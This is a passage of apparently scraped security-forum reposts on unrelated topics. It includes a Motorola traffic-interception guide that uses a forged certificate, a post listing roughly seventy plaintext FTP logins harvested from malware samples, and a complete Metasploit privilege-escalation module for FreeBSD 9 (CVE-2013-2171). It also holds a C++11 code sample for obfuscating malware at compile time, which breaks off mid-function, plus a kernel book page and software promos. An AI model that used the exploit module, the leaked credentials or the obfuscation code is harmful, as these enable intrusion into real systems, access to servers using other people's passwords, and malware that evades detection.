device, the results of your testing, and your name/nickname/handle/URL/etc. if you'd like to be identified. Steps to reproduce - HTTP/HTTPS data capture There are a number of approaches that can be used to reproduce the results in this article. This is the method that I used. Of course, the same testing can be performed in order to validate that non-Motorola devices are or are not behaving this way. Important: I strongly recommend that you do not modify in any way the data your phone sends to Motorola. I also strongly recommend that you do not actively probe, scan, or test in any way the Blur web service. The instructions on this page are intended to provide a means of passively observing the traffic to Motorola in order to understand what your phone may be doing without your knowledge or consent. Connect a wireless access point to a PC which has at least two NICs. Use Windows Internet Connection Sharing to give internet access to the wireless AP and its clients. Set up an intercepting proxy on the PC. I used Burp Suite Professional for the first part of my testing, then switched to OWASP ZAP (which is free) for the rest, since I used a personal system for that phase. Make sure the proxy is accessible on at least one non-loopback address so that other devices can proxy through it.[1] Configure a Motorola Android device to connect to the wireless AP, and to use the intercepting proxy for their web traffic (in the properties for that wireless connection). Install the root signing certificate for the intercepting proxy on the Motorola Android device. This allows the intercepting proxy to view HTTPS traffic as well as unencrypted HTTP. Power the Motorola Android device off, then back on. This seems to be necessary to cause all applications to recognize the new trusted certificate, and will also let you intercept the oAuth negotiation with Motorola./li> Configure and use anything in the Account section of the device. Use the built-in Social Networking application. Take a picture and use the Share function to upload it to one or more photo-sharing services. Leave the device on for long enough that it sends other system data to Motorola automatically. Steps to reproduce - check-in data decompression If you'd like to decompress one of these gzipped data packages, there are also a number of approaches available, but this is the one I used: Export the raw (binary) request from your intercepting proxy's proxy history. In ZAP, right-click on the history entry and choose Save Raw -> Request -> Body. In Burp Suite, right-click on the history entry and choose Save Item, then uncheck the Base64-encode requests and responses box before saving. Note: you cannot use the bulk export feature of either tool for this step to work - both of them have a quirk in which exporting individual requests preserves binary data, but exporting in bulk corrupts binary data by converting a number of values to 0x3F (maybe it's some Java library that does that when exporting as ASCII?). Open the exported data in a hex editor (I use WinHex). Remove everything up to the first 0x1F8B in the file. See example screenshot below. Save the modified version (I added a .gz extension for clarity). See example screenshot below. Decompress the resulting file using e.g. the Linux gzip -d command, or e.g. 7-zip. Open the decompressed file in a text editor that correctly interprets Unix-style line breaks (I used Notepad++, partly because it shows unprintable characters in a useful way, and there is some binary data mixed in with the text in these files). Examine the data your phone is sending to Motorola. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Manually removing extra data so the file will be recognized as gzipped [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] GZip header (0X1F8B) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Hex editor view of the data [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Hex editing complete [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Steps to reproduce - XMPP communication channel This section requires more technical skill and time to replicate than the other two. Right now, it assumes that you have access to a Linux system that is set up with two network interfaces and which can be easily configured to forward all network traffic from the first interface to the second using iptables. If you have a system that is set up to run Mallory successfully already (even though you won't be using Mallory itself here), that would be ideal. I am preparing a detailed ground-up build document and will release that shortly. In the meantime, assuming you have such a system and some experience using this sort of thing, download XMPPPeek and you should have the tool you need. Generate an SSL server certificate and private key (in PEM format) with the common name of *.svcmot.com. I made all of the elements of my forged cert match the real one as closely as possible, but I don't know how important this is other than the common name. Load the CA cert you signed the *.svcmot.com cert with onto your Motorola Android device. Again, I used a CA cert that matched the human-readable elements of the one used by the real server, but I don't know how important that is in this specific case. You may need to explicitly install the forged *.svcmot.com cert onto your Motorola Android device as well. Run the shell script from the XMPPPeek page to cause all traffic from the internal interface to be forwarded to the external interface, with the exception of traffic with a destination port of 5222, which should be routed to the port that XMPPPeek will be listening on. Start XMPPPeek and wait for your phone to connect. I used a VirtualBox VM with a virtual NIC which was connected for internet access, and a USB NIC which I connected to an old wireless access point. So my phone connected to that AP, which connected through the man-in-the-middle system, which connected to the actual internet connection. I configured the phone to also proxy web traffic through OWASP ZAP so that I could match up the XMPP traffic with its HTTP and HTTPS counterparts. Footnotes [TABLE=class: FootnoteTable] [TR] [TD=class: FootnoteNumberCell] 1. [/TD] [TD=class: FootnoteContentCell] For example, with the default Windows ICS configuration, you can bind the proxy to 192.168.137.1:8071. [/TD] [/TR] [TR] [TD=class: FootnoteNumberCell] 2. [/TD] [TD=class: FootnoteContentCell] Mine starts with a 4, but does not pass a Luhn check, in case you were curious. [/TD] [/TR] [/TABLE] Sursa: Motorola Is Listening - Projects - Beneath the Waves
-
Infiltrating malware servers without doing anything
Nytro replied to Nytro's topic in Tutoriale in engleza
cURL-ul pulii... Pentru cei care mai fac request-uri cu cacatul de cURL, la URL aveti grija sa dati replace la spatii cu "+": curl_setopt ($ch, CURLOPT_URL, str_replace(' ', '+', $_GET['url'])); -
[h=3]Infiltrating malware servers without doing anything[/h] Today i was searching more samples of BlackPOS because this malware use FTP protocol. And knowing this, i was interested to crawl more panels but then i realised something... Why did i look only for BlackPOS, instead of targeting everything ? So i downloaded a random malware pack found on internet and send everything to Cuckoo. After i've just parsed each of these generated pcaps to get some stuff (simple but effective) Everything automated of course, it's too enormous to do that manually, especially on malware pack. Cuckoo. pcap junkie. Here is a small part: ftp://u479622:y6yf2023@212.46.196.140 - Win32/Usteal ftp://4bf3-cheats:hydsaww56785678@193.109.247.80 - Win32/Usteal ftp://u445497390:090171qq@31.170.164.56 - Win32/Usteal ftp://raprap8:9Y7cGxOW@89.108.68.81 - Win32/Usteal ftp://u195253707:1997qwerty@31.170.165.230 - Win32/Usteal ftp://pronzo_615:f4690x0nq8@91.223.216.18 - Win32/Usteal ftp://lordben8:xCoMFM2c@89.108.68.89 - Win32/Usteal ftp://u698037800:denisok1177@31.170.165.251 - Win32/Usteal ftp://u268995895:vovamolkov123@31.170.165.187 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://oiadoce:cremado33@187.17.122.141 - Win32/Delf.P ftp://cotuno:nokia400@198.23.57.29 - Win32/SecurityXploded.A ftp://fake01:13758@81.177.6.51 - WS.Reputation.1 ftp://h51694:2222559@91.227.16.13 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Usteal ftp://h51694:2222559@91.227.16.13 - Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://getmac:8F4ODYLQlvpjjQ==@222.35.250.56 - Win32/Ganelp.G ftp://u797638036:951753zx@31.170.165.29 - Virus.Downloader.Rozena ftp://b12_8082975:djdf3549384@10.0.2.15 - Win32/Ganelp.gen!A ftp://onthelinux:741852abc@209.202.252.54 - Win32/Ganelp.E ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://u206748555:as3515789@31.170.165.165 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://griptoloji:3INULAX@46.16.168.174 - Win32/Usteal ftp://u459704296:ded7753191ded@31.170.164.244 - Win32/Usteal ftp://dedmen2:reaper24chef@176.9.52.231 - Win32/Usteal ftp://srv35913:JLN18Hp7@78.110.50.123 - F*ck this shit ftp://ftp1970492:ziemniak123@213.202.225.201 - F*ck this shit ftp://dron2258:NRm8CNfW@89.108.68.89 - F*ck this shit ftp://u996543000:123456789a@31.170.165.235 - F*ck this shit ftp://u500739002:jd7H2ni99s@31.170.165.199 - F*ck this shit ftp://0dmaer:1780199d@193.109.247.83 - F*ck this shit ftp://u404100999:vardan123@31.170.164.25 - F*ck this shit ftp://a9951823:www.ry123456@31.170.161.56 - F*ck this shit ftp://u194291799:80997171405@31.170.165.18 - F*ck this shit ftp://u478149:qqgclnbi@212.46.196.140 - F*ck this shit ftp://u114972719:1052483w@31.170.165.192 - F*ck this shit ftp://a1954396:omeromer123@31.170.162.103 - F*ck this shit ftp://googgle.ueuo.com:741852@5.9.82.27 - F*ck this shit ftp://fr32920:Nw3hRUme@92.53.98.21 - F*ck this shit ftp://u974422848.root:vertrigo@31.170.164.119 - F*ck this shit ftp://u205783311:gomogej200897z@31.170.165.192 - F*ck this shit ftp://u188483768:andrewbogdanov1@31.170.165.251 - F*ck this shit ftp://coinmint@coinslut.com:c01nm1nt!@108.170.30.2 - F*ck this shit ftp://agooga:nokiamarco@198.23.57.29 - F*ck this shit ftp://nicusn:n0305441@198.23.57.29 - F*ck this shit ftp://u355595964:xmNmK4CfvX@31.170.165.193 - F*ck this shit ftp://fmstu421:oxjQG1i7@46.4.94.180 - F*ck this shit ftp://u651787226:123698745s@31.170.164.98 - F*ck this shit ftp://u492312765:530021354@31.170.165.250 - F*ck this shit ftp://mandaryn:m0jak0chanaania@213.180.150.18 - F*ck this shit ftp://spechos8:onxGoTDG@89.108.68.85 - F*ck this shit ftp://6fidaini:vardan123@193.109.247.80 - F*ck this shit ftp://8steamsell:frozenn1@195.216.243.45 - F*ck this shit ftp://u478644:57zw1q56@212.46.196.138 - F*ck this shit ftp://u478230:lytlz3ub@212.46.196.133 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://sme8:y6kByIZA@89.108.68.85 - F*ck this shit ftp://koctbijib1@mail.ru:83670bb9072b@93.189.41.100 - F*ck this shit ftp://u457127536:741852963q@31.170.165.245 - F*ck this shit ftp://u450728967:987456987@31.170.165.187 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://0lineage2-world:plokijuh@195.216.243.7 - F*ck this shit ftp://expox@1:0628262733Y@188.40.138.148 - F*ck this shit ftp://admin@enhanceviews.elementfx.com:123456@198.91.81.3 - F*ck this shit ftp://ih_3676461:123456@209.190.85.253 - F*ck this shit ftp://0alfa-go-cs:killer2612@195.216.243.45 - F*ck this shit ftp://5nudapac:nudapac@195.216.243.82 - F*ck this shit ftp://450857:6a5124c7@83.125.22.167 - F*ck this shit I've added signature manually by browsing VirusTotal report but i got too many results so i've just leaved 'F*ck this shit' to all of them. Crawling VirusTotal with the API can be also an idea to retrieve results but i'm lazy. Looking at random pcap i've found some was fun: Malware using free hosting service is a bad idea: Malware builded with wrong datas (epic failure) Malware badly coded: Infecting yourself with Ardamax and enabling all features on it is a bad idea: Another configuration failure: FTP's full of sh*t: You can learn about actors, eg from dedmen2@176.9.52.231, emo boy (i've included him on the ftp list): Protip: don't buy a Nikon Coolpix L14v1.0, low quality picture. I got also some false positive, this one is fun because it's a server against malware infection: I have no idea why UsbFix was on a malware pack, anyway the use of FTP protocol for legit tools is also a bad idea, and this is not the only 'anti-malware' server i've found, got some weird stuff for viral update and many others, this technic is a double edged sword but most of result lead on malware servers. Posted by Steven K at 00:18 Sursa: XyliBox: Infiltrating malware servers without doing anything
-
Linux Kernel in a Nutshell This is the web site for the book, Linux Kernel in a Nutshell, by Greg Kroah-Hartman, published by O'Reilly. About [TABLE] [TR] [TD] To quote the "official" O'Reilly site for the book: Written by a leading developer and maintainer of the Linux kernel, Linux Kernel in a Nutshell is a comprehensive overview of kernel configuration and building, a critical task for Linux users and administrators. No distribution can provide a Linux kernel that meets all users' needs. Computers big and small have special requirements that require reconfiguring and rebuilding the kernel. Whether you are trying to get sound, wireless support, and power management working on a laptop or incorporating enterprise features such as logical volume management on a large server, you can benefit from the insights in this book. Linux Kernel in a Nutshell covers the entire range of kernel tasks, starting with downloading the source and making sure that the kernel is in sync with the versions of the tools you need. In addition to configuration and installation steps, the book offers reference material and discussions of related topics such as control of kernel options at runtime. A key benefit of the book is a chapter on determining exactly what drivers are needed for your hardware. Also included are recipes that list what you need to do to accomplish a wide range of popular tasks. To quote me, the author of the book: If you want to know how to build, configure, and install a custom Linux kernel on your machine, buy this book. It is written by someone who spends every day building, configuring, and installing custom kernels as part of the development process of this fun, collaborative project called Linux. I'm especially proud of the chapter on how to figure out how to configure a custom kernel based on the hardware running on your machine. This is an essential task for anyone wanting to wring out the best possible speed and control of your hardware. [/TD] [TD][/TD] [/TR] [/TABLE] Audience This book is intended to cover everything that is needed to know in order to properly build, customize, and install the Linux kernel. No programming experience is needed to understand and use this book. Some familiarity with how to use Linux, and some basic command-line usage is expected of the reader. This book is not intended to go into the programming aspects of the Linux kernel; there are many other good books listed in the Bibliography that already cover this topic. Secret Goal (i.e. why I wrote this book and am giving it away for free online) I want this book to help bring more people into the Linux kernel development fold. The act of building a customized kernel for your machine is one of the basic tasks needed to become a Linux kernel developer. The more people that try this out, and realize that there is not any real magic behind the whole Linux kernel process, the more people will be willing to jump in and help out in making the kernel the best that it can be. License This book is available under the terms of the Creative Commons Attribution-ShareAlike 2.5 license. That means that you are free to download and redistribute it. The development of the book was made possible, however, by those who purchase a copy from O'Reilly or elsewhere. Kernel version The book is current as of the 2.6.18 kernel release, newer kernel versions will cause some of the configuration items to move around and new configuration options will be added. However the main concepts in the book still remain for any kernel version released. Downloads The book is available for download in either PDF or DocBook format for the entire book, or by the individual chapter. The entire history of the development of the book (you too can see why the first versions of the book were 1000 pages long) can be downloaded in a git repository. Linux Kernel in a Nutshell chapter files: [TABLE] [TR=class: Odd] [TD]Title page[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [TR=class: Even] [TD]Copyright and credits[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [TR=class: Odd] [TD]Preface[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part I: Building the Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 1: Introduction[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 2: Requirements for Building and Using the Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 3: Retrieving the Kernel Source[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 4: Configuring and Building[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 5: Installing and Booting from a Kernel [/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 6: Upgrading a Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Part II: Major Customizations[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 7: Customizing a Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 8: Kernel Configuration Recipes[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part III: Kernel Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 9: Kernel Boot Command-Line Parameter Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 10: Kernel Build Command-Line Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 11: Kernel Configuration Option Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part IV: Additional Information[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Appendix A: Helpful Utilities[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Appendix B: Bibliography[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Index[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [/TABLE] Full Book Downloads: [TABLE] [TR=class: even] [TD] Tarball of all LKN PDF files (3MB)[/TD] [/TR] [TR=class: even] [TD] Tarball of all LKN DocBook files (1MB)[/TD] [/TR] [/TABLE] git tree of the book source can be browsed at http://git2.kernel.org/git/?p=linux/kernel/git/gregkh/lkn.git. To clone this tree, run: git clone git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/lkn.git Sursa: Linux Kernel in a Nutshell
-
[h=1]FreeBSD 9 Address Space Manipulation Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info={}) super( update_info( info, { 'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability that can be used to modify portions of a process's address space, which may lead to privilege escalation. Systems such as FreeBSD 9.0 and 9.1 are known to be vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Konstantin Belousov', # Discovery 'Alan Cox', # Discovery 'Hunger', # POC 'sinn3r' # Metasploit ], 'Platform' => [ 'bsd' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'References' => [ [ 'CVE', '2013-2171' ], [ 'OSVDB', '94414' ], [ 'EDB', '26368' ], [ 'BID', '60615' ], [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ] ], 'Targets' => [ [ 'FreeBSD x86', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => "Jun 18 2013", } )) register_options([ # It isn't OptPath becuase it's a *remote* path OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), ], self.class) end def check res = session.shell_command_token("uname -a") return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/ Exploit::CheckCode::Safe end def write_file(fname, data) oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\" session.shell_command_token("printf \"#{oct_data}\" > #{fname}") session.shell_command_token("chmod +x #{fname}") chk = session.shell_command_token("file #{fname}") return (chk =~ /ERROR: cannot open/) ? false : true end def upload_payload fname = datastore['WritableDir'] fname = "#{fname}/" unless fname =~ %r'/$' if fname.length > 36 fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters") end fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}" p = generate_payload_exe f = write_file(fname, p) return nil if not f fname end def generate_exploit(payload_fname) # # Metasm does not support FreeBSD executable generation. # path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin") x = File.open(path, 'rb') { |f| f.read(f.stat.size) } x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00")) end def upload_exploit(payload_fname) fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}" bin = generate_exploit(payload_fname) f = write_file(fname, bin) return nil if not f fname end def exploit payload_fname = upload_payload fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if payload_fname.nil? print_status("Payload #{payload_fname} uploaded.") exploit_fname = upload_exploit(payload_fname) fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil? print_status("Exploit #{exploit_fname} uploaded.") register_files_for_cleanup(payload_fname, exploit_fname) print_status("Executing #{exploit_fname}") cmd_exec(exploit_fname) end end Sursa: FreeBSD 9 Address Space Manipulation Privilege Escalation
-
[TABLE] [TR] [TD=align: justify][TABLE=width: 100%] [TR] [TD=align: justify]Hidden File Finder is the free software to quickly scan and discover all the Hidden files on your Windows system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=align: justify] It performs swift multi threaded scan of all the folders parallely and quickly uncovers all the hidden files. It automatically detects the Hidden Executable Files (EXE, DLL, COM etc) and shows them in red color for easier identification. Similarly 'Hidden Files' are shown in black color and 'Hiddden Folders' are shown in blue color. One of its main feature is the Unhide Operation. You can select one or all of the discovered Hidden files and Unhide them with just a click. Successful 'Unhide operations' are shown in green background color while failed ones are shown in yellow background. It is very easy to use with its cool GUI interface. Particularly, it will be more handy for Penetration testers and Forensic investigators. It is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Features[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Free, Easy to use GUI based Software Fast multi threaded Hidden File finder to quickly scan entire computer, drive or folder. Unhide all the Hidden files with one click. Color based representation of Hidden Files/Folders/Executable Files and Unhide operations. Open the folder in explorer by double clicking on the List Sort feature to arrange the Hidden files based on name/size/type/date/path Detailed hidden file scan report in HTML format Fully portable and can be run from anywhere Also includes Installer for local installation/un-installation [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Screenshot 1: Hidden File Finder showing all the Hidden files/folders discovered during the scan[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]Screenshot 2: Detailed HTML Report of Hidden File scanning operation.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Release History[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 90%, align: center] [TR] [TD=class: page_sub_subheader]Version 1.0: 25th Jun 2013[/TD] [/TR] [TR] [TD]First public release of HiddenFileFinder[/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Download[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download Hidden File Finder v1.0 License : Freeware Platform : Windows XP, 2003, Vista, Windows 7, Windows 8 Download [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] Sursa: Hidden File Finder : Free Tool to Find and Unhide/Remove all the Hidden Files | www.SecurityXploded.com
-
[h=1]Visual Studio 2013 Preview[/h]By: Robert Green Visual Studio 2013 Preview is here with lots of exciting new features across Windows Store, Desktop and Web development. Dmitry Lyalin joins Robert for a whirlwind tour of this preview of the next release of Visual Studio, which is now available for download. Dmitry and Robert show the following in this episode: Recap of Team Foundation Service announcements from TechEd [02:00], including Team Rooms for collaboration, Code Comments in changesets, mapping backlog items to features IDE improvements [11:00], including more color and redesigned icons, undockable Pending Changes window, Connected IDE and synchronized settings Productivity improvements [17:00], including CodeLens indicators showing references, changes and unit test results, enhanced scrollbar, Peek Definition for inline viewing of definitions Web development improvements [28:00], including Browser Link for connecting Visual Studio directly to browsers, One ASP.NET Debugging and diagnostics improvements [37:00], including edit and continue in 64-bit projects, managed memory analysis in memory dump files, Performance and Diagnostics hub to centralize analysis tools [44:00], async debugging [51:00] Windows Store app development improvements, including new project templates [40:00], Energy Consumption and XAML UI Responsiveness Analyzers [45:00], new controls in XAML and JavaScript [55:00], enhanced IntelliSense and Go To Definition in XAML files [1:00:00] Visual Studio 2013 and Windows 8.1: Visual Studio 2013 Preview download Visual Studio 2013 Preview announcement Windows 8.1 Preview download Windows 8.1 Preview announcement Additional resources: Visual Studio team blog Brian Harry's blog ALM team blog Web tools team blog Modern Application Lifecycle Management talk at TechEd Microsoft ASP.NET, Web, and Cloud Tools Preview talk at TechEd Using Visual Studio 2013 to Diagnose .NET Memory Issues in Production What's new in XAML talk at Build What's new in WinJS talk at Build [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 58.9 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 355.3 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 174.0 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 781.7 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 545.2 MB High Quality WMV (PC, Xbox, MCE) Sursa: Visual Studio 2013 Preview | Visual Studio Toolbox | Channel 9
-
[h=1]Malware related compile-time hacks with C++11[/h]by LeFF Hello, community! This code shows how some features of the new C++11 standard can be used to randomly and automaticaly obfuscate code for every build you make (so for every build you will have different hash-values, different encrypted strings and so on)... I decided to show examples on random code generation, string hashing and string encryption only, as more complex ones gets much harder to read... Code is filled with comments and pretty self-explanatory, but if you have some questions, feel free to ask... Hope this stuff will be useful for you, guys! #include <stdio.h> #include <stdint.h> //-------------------------------------------------------------// // "Malware related compile-time hacks with C++11" by LeFF // // You can use this code however you like, I just don't really // // give a shit, but if you feel some respect for me, please // // don't cut off this comment when copy-pasting... ;-) // //-------------------------------------------------------------// // Usage examples: void exampleRandom1() __attribute__((noinline)); void exampleRandom2() __attribute__((noinline)); void exampleHashing() __attribute__((noinline)); void exampleEncryption() __attribute__((noinline)); #ifndef vxCPLSEED // If you don't specify the seed for algorithms, the time when compilation // started will be used, seed actually changes the results of algorithms... #define vxCPLSEED ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \ (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \ (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000) #endif // The constantify template is used to make sure that the result of constexpr // function will be computed at compile-time instead of run-time template <uint32_t Const> struct vxCplConstantify { enum { Value = Const }; }; // Compile-time mod of a linear congruential pseudorandom number generator, // the actual algorithm was taken from "Numerical Recipes" book constexpr uint32_t vxCplRandom(uint32_t Id) { return (1013904223 + 1664525 * ((Id > 0) ? (vxCplRandom(Id - 1)) : (vxCPLSEED))) & 0xFFFFFFFF; } // Compile-time random macros, can be used to randomize execution // path for separate builds, or compile-time trash code generation #define vxRANDOM(Min, Max) (Min + (vxRAND() % (Max - Min + 1))) #define vxRAND() (vxCplConstantify<vxCplRandom(__COUNTER__ + 1)>::Value) // Compile-time recursive mod of string hashing algorithm, // the actual algorithm was taken from Qt library (this // function isn't case sensitive due to vxCplTolower) constexpr char vxCplTolower(char Ch) { return (Ch >= 'A' && Ch <= 'Z') ? (Ch - 'A' + 'a') : (Ch); } constexpr uint32_t vxCplHashPart3(char Ch, uint32_t Hash) { return ((Hash << 4) + vxCplTolower(Ch)); } constexpr uint32_t vxCplHashPart2(char Ch, uint32_t Hash) { return (vxCplHashPart3(Ch, Hash) ^ ((vxCplHashPart3(Ch, Hash) & 0xF0000000) >> 23)); } constexpr uint32_t vxCplHashPart1(char Ch, uint32_t Hash) { return (vxCplHashPart2(Ch, Hash) & 0x0FFFFFFF); } constexpr uint32_t vxCplHash(const char* Str) { return (*Str) ? (vxCplHashPart1(*Str, vxCplHash(Str + 1))) : (0); } // Compile-time hashing macro, hash values changes using the first pseudorandom number in sequence #define vxHASH(Str) (uint32_t)(vxCplConstantify<vxCplHash(Str)>::Value ^ vxCplConstantify<vxCplRandom(1)>::Value) // Compile-time generator for list of indexes (0, 1, 2, ...) template <uint32_t...> struct vxCplIndexList {}; template <typename IndexList, uint32_t Right> struct vxCplAppend; template <uint32_t... Left, uint32_t Right> struct vxCplAppend<vxCplIndexList<Left...>, Right> { typedef vxCplIndexList<Left..., Right> Result; }; template <uint32_t N> struct vxCplIndexes { typedef typename vxCplAppend<typename vxCplIndexes<N - 1>::Result, N - 1>::Result Result; }; template <> struct vxCplIndexes<0> { typedef vxCplIndexList<> Result; }; // Compile-time string encryption of a single character const char vxCplEncryptCharKey = vxRANDOM(0, 0xFF); constexpr char vxCplEncryptChar(const char Ch, uint32_t Idx) { return Ch ^ (vxCplEncryptCharKey + Idx); } // Compile-time string encryption class template <typename IndexList> struct vxCplEncryptedString; template <uint32_t... Idx> struct vxCplEncryptedString<vxCplIndexList<Idx...> > { char Value[sizeof...(Idx) + 1]; // Buffer for a string // Compile-time constructor constexpr inline vxCplEncryptedString(const char* const Str) : Value({ vxCplEncryptChar(Str[Idx], Idx)... }) {} // Run-time decryption char* decrypt() { for(uint32_t t = 0; t < sizeof...(Idx); t++) { this->Value[t] = this->Value[t] ^ (vxCplEncryptCharKey + t); } this->Value[sizeof...(Idx)] = '\0'; return this->Value; } }; // Compile-time string encryption macro #define vxENCRYPT(Str) (vxCplEncryptedString<vxCplIndexes<sizeof(Str) - 1>::Result>(Str).decrypt()) // A small random code path example void exampleRandom1() { switch(vxRANDOM(1, 4)) { case 1: { printf("exampleRandom1: Code path 1!\n"); break; } case 2: { printf("exampleRandom1: Code path 2!\n"); break; } case 3: { 